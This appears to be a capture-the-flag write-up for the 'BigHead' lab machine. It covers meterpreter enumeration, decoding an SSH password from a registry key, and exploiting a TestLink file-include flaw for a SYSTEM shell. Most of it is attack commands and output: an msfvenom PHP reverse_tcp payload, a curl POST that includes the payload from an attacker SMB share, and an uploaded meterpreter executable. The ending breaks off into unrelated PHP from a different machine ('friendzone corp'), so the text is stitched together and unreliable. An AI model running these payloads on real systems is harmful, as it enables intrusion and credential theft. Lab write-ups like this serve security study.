' \ .---. - (_(=)_) |( ' ) | | \ `-' / - (_I_) (_{;}_)| | \ / - '---' '(_,_) '---' `'-..-' - .---. .---. ____ .-'''-. .---. .---. - .-, | | |_ _| .' __ `. / _ \| | |_ _| - ,-.| \ _ | | ( ' ) / ' \ \ (`' )/`--'| | ( ' ) - \ '_ / | | '-(_{;}_)|___| / |(_ o _). | '-(_{;}_) - _`,/ \ _/ | (_,_) _.-` | (_,_). '. | (_,_) - ( '\_/ \ | _ _--. | .' _ |.---. \ :| _ _--. | - `"/ \ ) |( ' ) | | | _( )_ |\ `-' ||( ' ) | | - \_/``" (_{;}_)| | \ (_ o _) / \ / (_{;}_)| | - '(_,_) '---' '.(_,_).' `-...-' '(_,_) '---' -``` - -Doing some enumeration next... - -System info: - -``` -meterpreter > getuid -Server username: PIEDPIPER\Nelson - -meterpreter > sysinfo -Computer : PIEDPIPER -OS : Windows 2008 (Build 6002, Service Pack 2). -Architecture : x86 -System Language : en_GB -Domain : DEVELOPMENT -Logged On Users : 5 -Meterpreter : x86/windows -``` - -Installed programs: - -Notice SSH is installed, 7-Zip and Keepass. - -``` -meterpreter > run post/windows/gather/enum_applications - -[*] Enumerating applications installed on PIEDPIPER - -Installed Applications -====================== - - Name Version - ---- ------- - 7-Zip 18.05 18.05 - Bitnami TestLink Module 1.9.17-0 - Bitvise SSH Server 7.44 (remove only) 7.44 - Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595) 1 - Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484) 1 - KeePass Password Safe 2.40 2.40 - Microsoft .NET Framework 3.5 SP1 3.5.30729 - Microsoft .NET Framework 4.5.2 4.5.51209 - Microsoft .NET Framework 4.5.2 4.5.51209 - Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 9.0.21022 - Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 - Mozilla Firefox 52.9.0 ESR (x86 en-GB) 52.9.0 - Notepad++ (32-bit x86) 7.5.9 - Oracle VM VirtualBox Guest Additions 5.2.12 5.2.12.0 - Python 2.7.15 2.7.15150 - Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111) 1 - Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416) 1 - Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629) 1 - Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697) 1 - Update for Microsoft .NET Framework 3.5 SP1 (KB963707) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4040977) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4096495) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4098976) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4338417) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4344149) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4457019) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4457038) 1 - Update for Microsoft .NET Framework 4.5.2 (KB4459945) 1 - VMware Tools 10.1.15.6677369 - XAMPP 5.6.36-0 -``` - -A local service is also listening on port 2020: - -``` -C:\nginx>netstat -an -netstat -an - -Active Connections - - Proto Local Address Foreign Address State - TCP 0.0.0.0:80 0.0.0.0:0 LISTENING - TCP 0.0.0.0:80 0.0.0.0:0 LISTENING - TCP 0.0.0.0:135 0.0.0.0:0 LISTENING - TCP 0.0.0.0:2020 0.0.0.0:0 LISTENING -``` - -To access it remotely we can use the `portfwd` command within meterpreter: - -``` -meterpreter > portfwd add -l 2020 -p 2020 -r 127.0.0.1 -[*] Local TCP relay created: :2020 <-> 127.0.0.1:2020 -``` - -It's some kind of SSH server: `Bitvise SSH Server (WinSSHD)` - -``` -# nc -nv 127.0.0.1 2020 -Ncat: Version 7.70 ( https://nmap.org/ncat ) -Ncat: Connected to 127.0.0.1:2020. -SSH-2.0-7.44 FlowSsh: Bitvise SSH Server (WinSSHD) 7.44: free only for personal non-commercial use -``` - -I don't have the credentials so I looked for a while in the registry and eventually found a needle in the haystack. - -``` -meterpreter > search -f *nginx* -Found 14 results... - c:\nginx\nginx.exe (3115008 bytes) - c:\nginx\conf\nginx-orig.conf (2773 bytes) - c:\nginx\conf\nginx.conf (6608 bytes) - c:\nginx\conf\nginx.conf_bkp (4525 bytes) - c:\nginx\contrib\geo2nginx.pl (1272 bytes) - c:\nginx\contrib\unicode2nginx\unicode-to-nginx.pl (1090 bytes) - c:\nginx\contrib\vim\ftdetect\nginx.vim (198 bytes) - c:\nginx\contrib\vim\ftplugin\nginx.vim (29 bytes) - c:\nginx\contrib\vim\indent\nginx.vim (250 bytes) - c:\nginx\contrib\vim\syntax\nginx.vim (125645 bytes) - c:\nginx\logs\nginx.pid (6 bytes) - c:\ProgramData\Microsoft\User Account Pictures\nginx.dat - c:\Users\All Users\Microsoft\User Account Pictures\nginx.dat - c:\Windows\System32\nginx.reg (4268 bytes) -``` - -The `nginx.reg` stands out: - -``` -C:\users\nelson>type c:\Windows\System32\nginx.reg -type c:\Windows\System32\nginx.reg -Windows Registry Editor Version 5.00 - -[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nginx] -"Type"=dword:00000010 -"Start"=dword:00000002 -"ErrorControl"=dword:00000001 -"ImagePath"=hex(2):43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,\ - 20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,6e,00,73,00,73,00,6d,00,5c,00,77,\ - 00,69,00,6e,00,33,00,32,00,5c,00,6e,00,73,00,73,00,6d,00,2e,00,65,00,78,00,\ - 65,00,00,00 -"DisplayName"="Nginx" -"ObjectName"=".\\nginx" -"Description"="Nginx web server and proxy." -"DelayedAutostart"=dword:00000000 -"FailureActionsOnNonCrashFailures"=dword:00000001 -"FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ - 00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00 -"Authenticate"=hex:48,00,37,00,33,00,42,00,70,00,55,00,59,00,32,00,55,00,71,00,39,00,55,00,2d,00,59,00,75,00,67,00,79,00,74,00,35,00,46,00,59,00,55,00,62,00,59,00,30,00,2d,00,55,00,38,00,37,00,74,00,38,00,37,00,00,00,00,00 -"PasswordHash"="336d72676e6333205361797a205472794861726465722e2e2e203b440a" - -[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nginx\Parameters] -"Application"=hex(2):43,00,3a,00,5c,00,6e,00,67,00,69,00,6e,00,78,00,5c,00,6e,\ - 00,67,00,69,00,6e,00,78,00,2e,00,65,00,78,00,65,00,00,00 -"AppParameters"=hex(2):00,00 -"AppDirectory"=hex(2):43,00,3a,00,5c,00,6e,00,67,00,69,00,6e,00,78,00,00,00 -"AppStdin"=hex(2):73,00,74,00,61,00,72,00,74,00,20,00,6e,00,67,00,69,00,6e,00,\ - 78,00,00,00 -"AppStdout"=hex(2):43,00,3a,00,5c,00,6e,00,67,00,69,00,6e,00,78,00,5c,00,6c,00,\ - 6f,00,67,00,73,00,5c,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,2e,00,6f,\ - 00,75,00,74,00,2e,00,6c,00,6f,00,67,00,00,00 -"AppStderr"=hex(2):43,00,3a,00,5c,00,6e,00,67,00,69,00,6e,00,78,00,5c,00,6c,00,\ - 6f,00,67,00,73,00,5c,00,65,00,72,00,72,00,6f,00,72,00,2e,00,6c,00,6f,00,67,\ - 00,00,00 - -[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nginx\Parameters\AppExit] -@="Restart" - -[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\nginx\Enum] -"0"="Root\\LEGACY_NGINX\\0000" -"Count"=dword:00000001 -"NextInstance"=dword:00000001 -``` - -The `Authenticate` key contains: `48,00,37,00,33,00,42,00,70,00,55,00,59,00,32,00,55,00,71,00,39,00,55,00,2d,00,59,00,75,00,67,00,79,00,74,00,35,00,46,00,59,00,55,00,62,00,59,00,30,00,2d,00,55,00,38,00,37,00,74,00,38,00,37,00,00,00,00,00` - -I like using Cyberchef to decode and convert data, it's much faster to try different filters/conversion than coding it in python. - - - -Password: `H73BpUY2Uq9U-Yugyt5FYUbY0-U87t87` - -I can now SSH in with user `nginx` but I'm stuck in some sort of limited shell: -``` -# ssh -p 2020 nginx@127.0.0.1 -nginx@127.0.0.1's password: --> `H73BpUY2Uq9U-Yugyt5FYUbY0-U87t87` - -bvshell:/$ whoami -whoami: Command not found. - -bvshell:/$ pwd -/ - -bvshell:/$ ls -anonymous apache apache_start.bat apache_stop.bat apps catalina_service.bat catalina_start.bat catalina_stop.bat cgi-bin -contrib ctlscript.bat FileZillaFTP filezilla_setup.bat filezilla_start.bat filezilla_stop.bat htdocs img install -licenses locale mailoutput mailtodisk MercuryMail mercury_start.bat mercury_stop.bat mysql mysql_start.bat -mysql_stop.bat nginx.exe passwords.txt perl php phpMyAdmin properties.ini readme_de.txt readme_en.txt -RELEASENOTES sendmail service.exe setup_xampp.bat src test_php.bat tmp tomcat uninstall.dat -uninstall.exe user.txt webalizer webdav xampp-control.exe xampp-control.ini xampp-control.log xampp_shell.bat xampp_start.exe -xampp_stop.exe -``` - -I checked out the Bitvise website for information on `bvshell` and saw that it's some kind of chroot jail: - - - -That would explain why the above directory listing of the root directory shows the content of xampp and not the root of the Windows server. - -There's a `user.txt` file in the directory but I can't seem to read it. -``` -bvshell:/$ cat user.txt --bvshell: Reading binary file as a text. -``` - -### Local File Include - -The Testlink application is located in `/apps/testlink/htdocs`. - -The `linkto.php` file contains an LFI, the important code is shown below: - -```php -// alpha 0.0.1 implementation of our new pipercoin authentication tech -// full API not done yet. just submit tokens with requests for now. -if(isset($_POST['PiperID'])){$PiperCoinAuth = $_POST['PiperCoinID']; //plugins/ppiper/pipercoin.php - $PiperCoinSess = base64_decode($PiperCoinAuth); - $PiperCoinAvitar = (string)$PiperCoinSess;} -[...] -require_once($PiperCoinAuth); -``` - -When I do a GET request on linkto.php, I get the following error message: - -``` -Fatal error: require_once(): Failed opening required '' (include_path='C:\xampp\php\PEAR;.;C:\xampp\apps\testlink\htdocs\lib\functions\;C:\xampp\apps\testlink\htdocs\lib\issuetrackerintegration\;C:\xampp\apps\testlink\htdocs\lib\codetrackerintegration\;C:\xampp\apps\testlink\htdocs\lib\reqmgrsystemintegration\;C:\xampp\apps\testlink\htdocs\third_party\') in C:\xampp\apps\testlink\htdocs\linkto.php on line 62 -``` - -The `linkto.php` has a `require_once($PiperCoinAuth)` command, and because `$PiperCoinAuth` is under direct control of users through the POST PiperCoinID parameter, we can include any arbitrary PHP file. - -I generated a PHP meterpreter payload. - -``` -# msfvenom -p php/meterpreter/reverse_tcp -o met.php LHOST=10.10.14.23 LPORT=4444 -[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload -[-] No arch selected, selecting arch: php from the payload -No encoder or badchars specified, outputting raw payload -Payload size: 1112 bytes -Saved as: met.php -``` - -Then sent a POST request to execute PHP code through my SMB server - -``` -# curl -XPOST --data "PiperID=1&PiperCoinID=\\\\10.10.14.23\share\met.php" http://code.bighead.htb/testlink/linkto.php -``` - -Finally, I get a proper shell as SYSTEM on the target system - -``` -msf5 exploit(multi/handler) > [*] Encoded stage with php/base64 -[*] Sending encoded stage (51106 bytes) to 10.10.10.112 -[*] Meterpreter session 4 opened (10.10.14.23:4444 -> 10.10.10.112:49159) at 2019-05-02 21:06:18 -0400 - -msf5 exploit(multi/handler) > sessions 4 -[*] Starting interaction with 4... - -meterpreter > getuid -Server username: SYSTEM (0) -``` -Got user flag: -``` -meterpreter > cat /users/nginx/desktop/user.txt -5f158a... -``` - -### Getting root.txt from Keepass - -The `root.txt` is yet another troll: - -``` -meterpreter > cat /users/administrator/desktop/root.txt - - * * * - - Gilfoyle's Prayer - -___________________6666666___________________ -____________66666__________66666_____________ -_________6666___________________666__________ -_______666__6____________________6_666_______ -_____666_____66_______________666____66______ -____66_______66666_________66666______666____ -___66_________6___66_____66___66_______666___ -__66__________66____6666_____66_________666__ -_666___________66__666_66___66___________66__ -_66____________6666_______6666___________666_ -_66___________6666_________6666__________666_ -_66________666_________________666_______666_ -_66_____666______66_______66______666____666_ -_666__666666666666666666666666666666666__66__ -__66_______________6____66______________666__ -___66______________66___66_____________666___ -____66______________6__66_____________666____ -_______666___________666___________666_______ -_________6666_________6_________666__________ -____________66666_____6____66666_____________ -___________________6666666________________ - - Prayer for The Praise of Satan's Kingdom - - Praise, Hail Satan! - Glory be to Satan the Father of the Earth - and to Lucifer our guiding light - and to Belial who walks between worlds - and to Lilith the queen of the night - As it was in the void of the beginning - Is now, -and ever shall be, Satan's kingdom without End - - so it is done. - - * * * -``` - -When I started a shell my PHP meterpreter kept dropping so I used the `multi/manage/upload_exec` metasploit module to upload an .exe meterpreter and get another meterpreter session. This time I could spawn a shell without losing access. - -``` -msf5 post(multi/manage/upload_exec) > run - -[*] Uploading /root/htb/bighead/met.exe to met.exe -[*] Executing command: met.exe -[*] Encoded stage with x86/shikata_ga_nai -[*] Sending encoded stage (179808 bytes) to 10.10.10.112 - -[*] Meterpreter session 7 opened (10.10.14.23:5555 -> 10.10.10.112:49167) at 2019-05-02 21:19:51 -0400 - -meterpreter > shell -Process 3316 created. -Channel 1 created. -Microsoft Windows [Version 6.0.6002] -Copyright (c) 2006 Microsoft Corporation. All rights reserved. - -C:\xampp\apps\testlink\htdocs>whoami -whoami -nt authority\system -``` - -The administrator's `C:\Users\Administrator\AppData\Roaming\KeePass` directory contains a Keepass configuration file: `keepass.config.xml`. It contains the name of the last keyfile used : `admin.png` and the database file: `root.txt`. Notice that the file name is `root.txt:Zone.Identifier` and not just `root.txt` so this means we are looking at NTFS alternate data streams here. - -``` -[...] -
Smart photo script for friendzone corp !
"; -//echo "* Note : we are dealing with a beginner php developer and the application is not tested yet !
"; - -echo "
Smart photo script for friendzone corp !
* Note : we are dealing with a beginner php developer and the application is not tested yet !
"; - echo "
image_name param is missed !
please enter it to show the image
default is image_id=a.jpg&pagename=timestamp
Something went worng ! , the script include wrong param !
You can't see the content ! , please login !